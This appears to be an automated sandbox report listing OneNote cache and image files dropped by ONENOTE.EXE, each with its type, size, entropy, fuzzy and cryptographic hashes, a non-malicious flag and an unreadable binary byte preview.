                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ*.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[F*ly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):3.2591823178769914
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:GFtLtGwb+zUctTcoQgsCRKtrZCrBJmQEtaDsNDEZVbsPJmQEtaDssDEZxlYJmQEg:1wb8xR8jPEDbPUErl7x//LGo
                                                                                                                                                                                                              MD5:40D37467D8BB5D9FDB1CFF36DE4A36F7
                                                                                                                                                                                                              SHA1:2F3CCFC5CFD040C5D80A8AFC962075BEE9834D27
                                                                                                                                                                                                              SHA-256:630390CE72A2D51CD15B228146B05B7128A46A41C40977BFDF5F44C743168DBB
                                                                                                                                                                                                              SHA-512:A7D7C77BEEDDB3063DECBE2FC616ED5EDB897C8F747F4CC6EFB6F012E7C03D98D1D210E7C5AAD3700271519A467A3AE5690596B1298135D5DB81AC1CDBB4AF85
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:........$...........t......................................?....................................................................................................\.........................................(.......(..4.......-...z-......z-X2.y.....Hn...(..4.......-....(.....|..<7..........D..<Z...1./...Z.D............D.......D...................................................%mjT&d..8,.T(P....T.<..D....w..D..X....D....7..D.......D....$................4..(.....x.(.....%mj.....%mj..J.F.#q.X..D.......D..<Z...1./...Z.2...v............................z-.%mj.....................................z-..c..,0...e...B4.$........[.-...I.......9......................8,......8,.....B.:;..............z2..J..(sUl[.8,.....B.:;.....8,..%mj..J.F.#q.X..%mj...z2..J..(sUl[........>...................|..<7......D..<Z...1./...Z.............................|..<7......D.......D..<Z...1./...Z......%mj..........c..,0...e...B4.$..............E........................................0...........e....4....
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):3.908265727815883
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:A1KRsgPucjDeI9cHh9iV8/hWOWRvc76QhOf2wv7hXcpT/cZ+RzGPVOx6q9x9NL7m:A1KmgPukWscCRA8fxI1RzFx6q9x9NL7m
                                                                                                                                                                                                              MD5:06D59E962436A083B9BCA12575CFFD88
                                                                                                                                                                                                              SHA1:ED99CD0E415AE6B36F45FDDE6E30732ECF887D31
                                                                                                                                                                                                              SHA-256:92D4C7FD12E6DC9C73128C101F901AE0B5BFABAEAFA805838EAF0E7C167C9422
                                                                                                                                                                                                              SHA-512:2635B6B115E4892E90499DEDF69D04DA42B1BFAFFD48F0DA28C36AC49E798DD42B4FA77064FB08AEA0D6A3291F22E62F11507CE27F4083E96695745F1FA85B06
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........v........ .. "..2...>...d...<...v.......@....!..........................................................................................................................................l...;...l....... {....z..I.......I.qk..B.....LZl....... {....z.l....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............+-6....02u.t......N...^.................tlq.vJ.7..,1.f............(...............................D....I.qk..B.....LZ.............+-6....02u.t...................................l.......l.......l...........................................l..j....l..T&~..l.......l....g..l..H....l.. .)..l..$....l....u...................;........4...4...4.................l..-l...l....z...y.. x.. ...........$........2..72..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.6..........(l..#l..8l....z...,4. .......$>........4...4
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):68633
                                                                                                                                                                                                              Entropy (8bit):7.709776384921022
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
                                                                                                                                                                                                              MD5:41241EE59AB7BC9EB34784E3BCE31CB4
                                                                                                                                                                                                              SHA1:98680761A51E9199CF3C89F68B5309FBEC7EE3CB
                                                                                                                                                                                                              SHA-256:035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
                                                                                                                                                                                                              SHA-512:3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                              Entropy (8bit):4.0573427858346305
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:DLaV/y4peiRJo+4iNY0B7WfOT/PjQKPkA:DW4RiRqFQY0B7WW
                                                                                                                                                                                                              MD5:EC140ED235BE3A5E86183E855983F812
                                                                                                                                                                                                              SHA1:AA025BA51A9DD6D0096C1435670E6193649FDDEB
                                                                                                                                                                                                              SHA-256:D3F53B0425487893C5B35BAB292C77C9AF221B2364629DCC002B88F41335A3AA
                                                                                                                                                                                                              SHA-512:EABC4E520351B79DE8E1ADD958A1A61F687F813DD3B8A6F526803FC78B30F23A03398FB4B19DBDC1D1EA82BEEC0151C4D465227D769F33B097BF11A90B2C5B23
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....>.......,...D.......x ..`9......>.......|...D...H...@....:...........................................................................................................................................I.......I.qk..B.....LZ\.......\......!.@N..-.\......!.@N..-.\....Cs....:....7...Cs..I.qk..B.....LZ.I............Cs......Cs......Cs..........................................Csj.....CsT.t...Cs......Cs..N...CsH.....Cs..5...Cs..F.%.Cs..................;........4...4...4..............Cs:.CsL.Cs..z...y.. x.. ...........$........2..72..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.5............'.Cs%.Cs9.Cs..z...,4. .......$>........4.@.4..`..7.....................D..n4..o4..p4...4. ..1........Cs*.....Cs....%.Cs#...'.Cs&...2.Cs....9.Cs....:.Cs$.....Cs........'.Cs%.Cs..Cs..z...,4. .......$>........4.@.4..`..7.....................D..n4..o4..p4...4. .F.+............................;........4...4...4...3..................Cs:.Cs..Cs..z...y.. x.. ...........$........2..72..7.....*
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):59832
                                                                                                                                                                                                              Entropy (8bit):7.308211468398169
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
                                                                                                                                                                                                              MD5:DCDD543A4E0BA2C1909BA095D46FFBCB
                                                                                                                                                                                                              SHA1:B86C89537138FE07255354202D3EAD0B53B3C54D
                                                                                                                                                                                                              SHA-256:28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
                                                                                                                                                                                                              SHA-512:5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):4.781910948413335
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:hsaDOlPq4yFDC2cbQJ5/xpVuF63ZvXUU1wRJb+uwO60diSv96UjhjKNWtlOD4GiH:2UncbQJ55LuAp/5wRJEO60iSl6U1ONkl
                                                                                                                                                                                                              MD5:62B3339EA16A1B4984E3109C9A2528F0
                                                                                                                                                                                                              SHA1:FA561DB506AB3707825404D26F493F02C6D58B87
                                                                                                                                                                                                              SHA-256:AA9FB0A187BF5B34E8014E9A21113DF8E489061B341479F5059E19C6F0BB6C77
                                                                                                                                                                                                              SHA-512:C64AE39280FB480B8E89317ECB6E8301152D16D40CC0A3BBCEF7628FA9A14394C37C80532A42494244AB64E46097B5E32D4319493FF4E6087FF555BA53D8B371
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...v.......v....... ..X-..2...>...2.......v.......@...H,...........................................................................................................................................I.......I.qk..B.....LZ.*..P....*.9z.....3%...*.9z.....3%...*...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............6{..~l..3.i...z.....N...^...............L.9...I.n.&.0...................................................I.qk..B......LZ............6{..~l..3.i...z...................................*.......*.......*...........................................*.j.....*.T.....*...o...*.......*...O...*...s...*.$.A.$.*.$.................;........4...4...4..............*.3.*.X.*...z...y.. x.. ...........$........2..72..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.9..............*.3.*.z.*...z...y.. x.. ...........$........2..72.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):53259
                                                                                                                                                                                                              Entropy (8bit):7.651662052139301
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
                                                                                                                                                                                                              MD5:2EE369ABB7936F8C28FF0ABDD224EA05
                                                                                                                                                                                                              SHA1:FE9D304A7B49E31EAE439369ABC548E265149636
                                                                                                                                                                                                              SHA-256:FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
                                                                                                                                                                                                              SHA-512:5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}.*.a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{|>..MN=:....Q[..H....a........|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u...*.p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:Matlab v4 mat-file (little endian) H\002, numeric, rows 1051426662, columns 0
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):72
                                                                                                                                                                                                              Entropy (8bit):2.3903321328919267
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:PtlQtllsHRJsl/lRl9ARatl:PtGuHRJsltG8X
                                                                                                                                                                                                              MD5:36988BF64B11CD52CCAEFA6215F4FAF1
                                                                                                                                                                                                              SHA1:13FCA9AC81AF697CC4444A95D4EB6647ACC00E8F
                                                                                                                                                                                                              SHA-256:E36B3BCB9053C32D901E68AB56C0D8A8EA1297C0E8C3F456A5681F263B27D36B
                                                                                                                                                                                                              SHA-512:F401F89B1649DF9F442E775B77EA9E3F7B39203AC05E609FE00697783F757DE8A58DFEDE0CA56B817C67143FE6CFC2485CF54C185C7211AAEE7E019245397564
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....f..>............H...................................,...............
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                              Entropy (8bit):5.386028245708025
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:20dv571PDWa+0sXsa75Qy6D6/hc/7fNNLQ6VN7lb+DfkvEACQwPG6Z:bhT+VL5r6ihcLzLQ6i4gG6
                                                                                                                                                                                                              MD5:EAF7634F7678D8E8511FC712D6A2A056
                                                                                                                                                                                                              SHA1:CB55E3EFBEE7D723D217BBE51F6A4131E19FA423
                                                                                                                                                                                                              SHA-256:BDE70CCAC301DD7F904D97FA2A2E3FAF143BD677F1E808B797AF0A55903B5D59
                                                                                                                                                                                                              SHA-512:7803C91843EF1BF1E83C5D88D37D77FA8EDAF2E8B31913B015E1FFCD4FF093969D63D2F9CFB9A03EDC9F3EF3817D2A533788B87C1EC289DB2E216DE48BF6665E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....................j................=...Y...:.........@...@.....$...,.......B..`H....................4@..B&. . ........s.....K.Z.G.A.......................................................................................................................?...?..............<............................................................................................................?...?..............~..@....r...._..R'WD..X.5'K......Op.b..F.$..i........_..x...j...4....K.} ].G.U...-......s.....K.Z.G.A......i.......t..........."..@h...+..D.".c.{i....[2sN...K..Y.)...........d......@\....Op.b..F.$..i........X.....C..p.'..........L...........^_.p.yYB.....#........................................@...N.?I.LC.J..+.....Op.b..F.$..i...........t......@4...h...+..D.".c.{i....s.....K.Z.G.A.......?..4..@t...V....R.X..LL.s.$..q.......m..M..u.........b..F.$..i...............(...4.....sR.QxI.o..Y.z>....s.....K.Z.G.A......).............J.i..K.y.R.MC.......F....Q...[.d.....4...V8O.<.!........==..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):2.3866630770867325
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:R9i1Dw9eSe51zN6W+UTdrLLJ/VyDioHvma/7eSq1UPhgllRE+1:3yDMqph+UTdLqvdpaUPYRE
                                                                                                                                                                                                              MD5:8A3FD8539047AAD2F542993F755CE206
                                                                                                                                                                                                              SHA1:4C06AD18AE8581C19E0D5C5FEC9F96E3562DDEE7
                                                                                                                                                                                                              SHA-256:15776C55BC2897AEDB3B262C94818D39D4685EDB3D944B0D274AC71311810348
                                                                                                                                                                                                              SHA-512:A262DA793676354E2C8ABA86C7437694DEFC8BB5A0C35D0E2177CCEBA4BB40B0E2C05D287767109AFB032D679409D43315DACD195E25F673D5556DFF55F64909
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:j...>.......................................................................................................................................................................0...j...>...^...........v..............[v.^.....`k`.^.......^......B....2.2.os-.....;.XC...os-....[v.^.....`k`.....^......B....2.2.^.......................................................................os-.....os-.....;.XC...^.......^......B....2.2.2...^.................................................................).....X.'......."..^..T.,......................................^.......os-..c..,0...e...B4.$.........|..tQ&G...%QE.3...%.:...........................4..(...(...............0...e... ..$.....m.....A.`q1.... .}..:..................0............4..e....5..b4............T-Do..-A...Q'.1.....(...(......%.:......5|.....J.ID".U.O........;.5....@...h.NG.....N...z...........................................................................................................;.5....@...h.NG.............................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):4.3544543042718
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:ectYzCt9SrbdO2MuptXQHZx5tFHO8xBwGy8OR2OCoOtYDSYZ8H2mtX4trLO6A6K:eMYuSrbMoXQHLD//0v4oPZQfXZ
                                                                                                                                                                                                              MD5:9629B6792EE358291620BFF8776097F6
                                                                                                                                                                                                              SHA1:6FF31914E603A2537153DFBB9D6E42DFCAA3F984
                                                                                                                                                                                                              SHA-256:13FDEB3780453A2C7A118B923C871548051F3FA794BE8C875E050218F21BFC66
                                                                                                                                                                                                              SHA-512:6644275C156100388F96F9D7E536C4EC4ACC513A2CB9FF303C27645825FD77D210B47B3D87254C69674FF8B1ECADDAEFF2654C30F33DCCF87AC608F821DF8341
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....$.......................................................................................................................................................$...........................................................x.................C=8.O...a;@f..-...-...)9.....-.......(.#..).0.Q.u....{.i.6.&L.w.....{.i...........................................................................5......-......G.)9...............................................................................-..P....-..P*i..-..d.]..-..`.T..........5H.G.#F......\....h.....................................`.{.i.........................-.......-......G.)9..............C=8.O...a;@fc.......`.......`...................................................`..J....`d.1....`N.:....`N.H....................................................4..(...(.....{.i.....{.i.6.&L.w..............C=8.O...a;@f.2...........&.....................`.{.i.......................................c..,..................$...........t...................(.#I
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                              Entropy (8bit):4.208305094975494
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:oiGMa0iKOmvokO2brRj0hVkeTkSR6Cd2r9mPFTjxu1v2tMCoj+Aka1wqgctqcXkI:o1B0Sxk7brkVLvRGrEFxw+AYcBgUaw
                                                                                                                                                                                                              MD5:5526D81FBD69F35E450996E000B22795
                                                                                                                                                                                                              SHA1:156E799D9B9F4C7744F5B45E0935CE23024D94B9
                                                                                                                                                                                                              SHA-256:780AACE48801B6678BDEE219D8874A9B2A7710D3ED255868F73F41A2AA2D148B
                                                                                                                                                                                                              SHA-512:A0DD99D8D9CC4BD65A5EA162A9EC27DD8E8C2CDD67265B7B96744541F26124AADE6DCA17D900290EEE1ED72A72B5EE97C34EFCB8079622AA5BBF539C79A75085
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:6......@........4.................................?.....?......?....?...................................................................................................0.......9j......9j.G.c.G.G..L.?...4.......4Y....p...........x.......x....15.K1B...$...Q.q.h.....9j.....SF.i...e...T,....9j.G.c.G.G..L.?69j.............................................................................5......-......G.)9................................................................................ ....... .......m.2LI2............SF.iE..e...T,........J...p.....$.v5?.....h..(12..q..C.....KH.9j.G.c.G.G..L.?6. .......m.2LI2.. ....$.v5?.....h..(..$.12..q..C.....KH.12.............Q.......Q.................................................9j...>..9j.\.H..9j...I....................................................4..~...1...(...(...<...O.n.e.N.o.t.e. .N.o.t.e.b.o.o.k.s.\.M.y. .N.o.t.e.b.o.o.k.......M.y. .N.o.t.e.b.o.o.k.........9j......9j.G.c.G.G..L.?6t.e.b.o.o.k.....2...&............. ...c..,........Q.q.h......9j.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):1.2765482351087298
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:JYqdCceZhvR//esvUtlE4zOOwhkMFT3k1lMXNadNd4yeZG/i9:qCCceZpJ/eXtlvbwSB1gNadNd4yeE/
                                                                                                                                                                                                              MD5:8D0512D82D3100D69FF91892326A5F4B
                                                                                                                                                                                                              SHA1:BA28A646812CFFB96B107D695E7E69376D18A848
                                                                                                                                                                                                              SHA-256:924FA25617EE40A6C5AADDCFBB9F7B18B87919241526EDB2424ECE49CE096667
                                                                                                                                                                                                              SHA-512:694935514FB5B8CAE0F0B28FE3901F91BBB4E54DFD489B0B578122DA6F4F58072713E5301DAF1EF8865397BA5C6F970E3F8D825B4D0E724E90D3BF02693BADFA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....>...........x....................?...................................................................................................................................................................2.......2.B0..O..:..(..............L.J.1<?..(.j.s.R...&..ug..j.s.....L.J.1<?..(......2.B0..O..:..(...2.............................................................................5......-......G.)9................................................................................1..p.AC..Z....c....h...N................c..[.E..).<...............................................................................c..[.E..).<...........1..p.AC..Z....c..........2.......2...................................................2...C...2.`.1...2...F....................................................4..~...1...(...(.......O.p.e.n. .S.e.c.t.i.o.n.s.......O.p.e.n. .S.e.c.t.i.o.n.s...........1.......O.p.e.n. .S.e.c.t.i.o.n.s.........j.s.....j.s.R...&..ug..............L.J.1<?..(.2.......................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                              Entropy (8bit):3.7833419575507463
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:MQN76VQWZO2RcSY1BopAI+seg0RcLYr7jSPR:v76e4REoqI1+Rn7jS
                                                                                                                                                                                                              MD5:567E40821646A5E609772BB82E1B3599
                                                                                                                                                                                                              SHA1:7CA67C50D91952C56C8AD9732BD1B896BF041DC8
                                                                                                                                                                                                              SHA-256:033B9E67C847335DA84BDBA2E04D7BA72446BD88307BD816ED7E84F9C36AA1F1
                                                                                                                                                                                                              SHA-512:ACBBFD39256196A0DDF1E4B27A5739CF984F788117BA378F0EA79CB71187B15022A3D49DCEBBE557A40A7CD0B9CCB1180F4075FF26586FD2B5264DF354BD27B7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:R.......Z...d...<............-..................D..@r...@...X.......................................................................................................................................^........).\.....).\.....).\..o.......op.. O.....q..).\.-6......p.).\..I.qk..B.....LZ.I....op.. O.....q....o..........).\.....).\.....).\.........................................).\j.Q..).\T....).\.....).\..W..).\.....).\..r..).\$....).\..........Z4...................4../4..04..............................p...........................C.a.l.i.b.r.i..........).\..z... ..$............................M0.Q...........C...?......@?..@?...PA...?...A.X.A.............").\#).\..z...,4. ...........$.4..V/.Q...........).\.).\.).\.).\..z...y.. x.. ...........$... ./.Q./.Q.............o..z...;............4...4..?.. ...................................."...a....5...5....Q..........5.7.K.<.O.=.=.K.9. .@.8.A.C.=.>.:...p.n.g..........A...@[ tA..@.......?.ZQ?................z..O......MV.-x}.K.......P........
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1354
                                                                                                                                                                                                              Entropy (8bit):7.799120546917745
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:AXFMpSCdmi2MTbWm/8T368Bf50D+1vDD9BFGBsQ5SOryjJ4w6++mPKc82UGOpIUg:AO4m122bQ36gfaS1rDw2QsOryjJ4xLml
                                                                                                                                                                                                              MD5:C2BF462C1311A92660999498F29394BD
                                                                                                                                                                                                              SHA1:4BD7C156F172C1114F33D80BAB05252C9F8E87C0
                                                                                                                                                                                                              SHA-256:5E0A8F7D863DAD057AC91FB888CFA7BE1D30A6CF65A908CE90081C323A0858B7
                                                                                                                                                                                                              SHA-512:1107117B3C4B843E5EB32CB13C5CA91E28857DDAE18A197F471D9FCA5B767C7441661FC3A21D2B6FF3C6EB91048A93598E1D86EA55A60A427D8E4B82E59A30C9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...(...(........m....sRGB.........pHYs...t...t..f.x....IDATXG..O.W....`...c.C..`.H(!@.[Q..B.D......Q..}.C...}.CTU.MR.j...[.....".x.B.x.wG.2$xf.J..W..g....}w.H.....b* ...../.V_|.....TC]-.d......\\Z..l......>..D....G.....}.]}.x...X...WZ....?.-..A..&x...Q$)U..../.w...?..!8IE..:.....6..y.z..Yg.`g.@(...z...VS..$@..q2.,."....RT.}..%..q.lA0....[m.................2...8..a.LJ....n......M.%x......\...$g.Y.p.Q^U....$;.r.....>...>...]..$...r..bz.P*.(....}:&'ldc...c|.bs.>z.:?.M....(.SR..a..o..*=2....i#..{......y.)....}.1_ .....T@O..F..d....Piu.TQA....#DY.S&G....j....3z..>zL..:...33...C&.S....h...LQk. ...hRSy&m..?...d.....l.].G...BL.-..N;.....s.0Q....T.(0...p....HU..d.V..z.)..2. ..........d...x.{......2.zdP.....;.?aeu......(..,#.....nj.... ....0.X..dr.T)x...4.V...]p8].p.PH.4f{.n.....x.........Z...O>DF.)^.Y.....p.Zf..1e.a.>."fm{.=hui...Fnn.T......./''...U<.,f'........:Y......ckk..RN.....f.omf..rZi.\..h.....|.4.,/......=.z%.F....*Z...>.*.A.....?.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):76485
                                                                                                                                                                                                              Entropy (8bit):7.79809544163696
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
                                                                                                                                                                                                              MD5:734BA03175EBC8B8E3EF57BC3DDC9D8E
                                                                                                                                                                                                              SHA1:1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
                                                                                                                                                                                                              SHA-256:275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
